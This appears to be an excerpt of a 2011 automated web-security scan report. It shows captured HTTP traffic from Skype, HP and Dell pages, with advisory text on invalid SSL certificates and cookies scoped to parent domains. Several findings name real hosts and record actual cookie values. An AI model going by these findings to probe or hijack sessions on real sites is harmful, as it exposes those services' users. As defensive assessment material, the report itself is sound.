href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Chile</a> ...[SNIP]... 
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Denmark</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-fr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in France</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-de-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Germany</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-gh-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Ghana</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Greece</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-hn-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-it-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Italy</a> ...[SNIP]... 
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-jp-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in Japan</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-mx-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Mexico</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the Netherlands</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nz-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in New Zealand</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ng-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Nigeria</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-py-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Paraguay</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-rs-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Serbia</a> ...[SNIP]... 
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-pt-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Portugal</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-sk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovakia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-si-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovenia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-za-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Africa</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-kr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Korea</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-es-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Spain</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ch-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Switzerland</a> ...[SNIP]... 
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gb-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the UK</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-uy-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Uruguay</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-us-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in the USA</a> ...[SNIP]...
Request
GET /en/subscriptions/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:19 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 107961
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Skype - ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dz-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Algeria</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ar-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Argentina</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-au-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Australia</a> ...[SNIP]... <li>400 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-br-400&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Brazil</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cm-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Cameroon</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-cl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Chile</a> ...[SNIP]... 
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-dk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Denmark</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-fr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in France</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-de-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Germany</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-gh-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Ghana</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Greece</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-hn-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-it-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Italy</a> ...[SNIP]... 
<li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-jp-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in Japan</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-mx-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Mexico</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nl-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the Netherlands</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-nz-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in New Zealand</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ng-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Nigeria</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-py-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Paraguay</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-rs-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Serbia</a> ...[SNIP]... 
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-pt-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Portugal</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-sk-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovakia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-si-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Slovenia</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-za-120&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Africa</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-kr-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in South Korea</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-es-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Spain</a> ...[SNIP]... <li>120 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-ch-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Switzerland</a> ...[SNIP]... 
<li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-gb-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in the UK</a> ...[SNIP]... <li>60 minutes <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-landline-uy-60&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines in Uruguay</a> ...[SNIP]... <li>Unlimited <a href="https://secure.skype.com/account/buy/package?product-type=package-global-country-mixed-us-unlimited&campaign-token=XEAADWKU&cm_mmc=socialm|skypeblogs-_-global|intl|pl-_-skype-_-football2010|subscriptions">free calls to landlines and mobiles in the USA</a> ...[SNIP]...
Request
GET /campus/p/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Request
GET /howto_QL_courses.jsp?contentType=How-to+in+2&mcid=explore-create HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP Learning center ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/19629/Color_your_business_.htm?courseSessionId=173976&campusId=11262" title="Learn how development of the right color scheme for your marketing collateral can take your business to the next level.">Color your business: develop a marketing color scheme</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/18330/Mastering_email_keep_your_inbox_clutter_free.htm?courseSessionId=175486&campusId=11262" title="Learn how to organize email files and folder structure and use your program's search functionality to achieve better inbox management.">Mastering email: keep your inbox clutter-free</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14760/Microsoft_Excel_2007.htm?courseSessionId=173985&campusId=11262" title="This animated demonstration introduces you to the new Microsoft Excel 2007 interface, which is very different from earlier versions.">Microsoft.. Excel 2007: take a tour of the interface and learn basic skills</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14168/Microsoft_Windows_Vi.htm?courseSessionId=173997&campusId=11262" title="This animated demonstration shows you how to find files using basic Search in Windows Vista.">Microsoft.. Windows Vista: find files using basic Search</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14763/Microsoft_Word_2007_take_a_tour_of_the_Ribbon.htm?courseSessionId=174000&campusId=11262" title="This animated demonstration shows you how to use the Ribbon, the new, tabbed navigation system in Microsoft Word 2007.">Microsoft.. Word 2007: take a tour of the Ribbon</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14167/Microsoft_Excel_2007_create_a_PivotTable.htm?courseSessionId=173981&campusId=11263" title="This step-by-step demonstration shows you how to summarize a large amount of data to glean some meaning from it using PivotTables in Microsoft Excel 2007.">Microsoft.. Excel 2007: create a PivotTable</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14171/Microsoft_Excel_2007_filter_data.htm?courseSessionId=173982&campusId=11263" title="This animated demonstration shows you how to filter data in Microsoft Excel 2007. ">Microsoft.. Excel 2007: filter data</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14170/Microsoft_Excel_2007.htm?courseSessionId=173983&campusId=11263" title="This animated demonstration shows you how to link and unlink information between Microsoft Excel workbooks.">Microsoft.. Excel 2007: link and unlink content between two workbooks</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/35909/Microsoft_Excel_2007.htm?courseSessionId=173977&campusId=11263" title="Formatting can make a chart come to life with colors, patterns and effects. This demonstration teaches you to manually format parts of a chart.">Microsoft.. Excel 2007: manually format parts of a chart</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14169/Microsoft_Excel_2007.htm?courseSessionId=173984&campusId=11263" title="This animated demonstration shows you how to record a simple macro in Excel and edit it in VBA.">Microsoft.. Excel 2007: record a simple macro and edit it in VBA</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/14760/Microsoft_Excel_2007.htm?courseSessionId=173985&campusId=11263" title="This animated demonstration introduces you to the new Microsoft Excel 2007 interface, which is very different from earlier versions.">Microsoft.. Excel 2007: take a tour of the interface and learn basic skills</a> ...[SNIP]... <td align="left" valign="top" width="540">
<a href="/tutorials/viewHowTo/p/courseId/40441/Microsoft_Excel_2010_creating_PivotTables.htm?courseSessionId=368865&campusId=11263" title="This step-by-step demonstration shows you how to summarize a large amount of data to glean some meaning from it using PivotTables in Microsoft Excel 2010.">Microsoft.. Excel 2010: creating PivotTables</a> ...[SNIP]... <td align="left" valign="top" width="540">
GET /intl/en-us/prices/premium HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:15 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54583
GET /intl/en-us/prices/premium/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:17 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54583
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0
Host: login.skype.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forums/houlihan-lokey-exit-opps HTTP/1.1
Host: www.wallstreetoasis.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=AMS|_kenshoo_clickid_&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinflexion HTTP/1.1
Host: 142.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:18:39 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:39 GMT; path=/; domain=.xg4ken.com
Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/DellPartsFamily.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76867
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:06 GMT; path=/
Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:05 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Dell C ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/ShopAllBrands.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 165178
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:26 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:25 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Shop B ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/batteryconfig.aspx?c=us&cs=04&l=en&s=bsd HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:19 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:18 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>Batter ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sna/category.aspx?c=us&l=en&s=dhs&category_id=5914&cs=19 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 122314
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|dhs|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:18 GMT; path=/
Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=A4186752,A4186751,A4186750; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:19 GMT; path=/
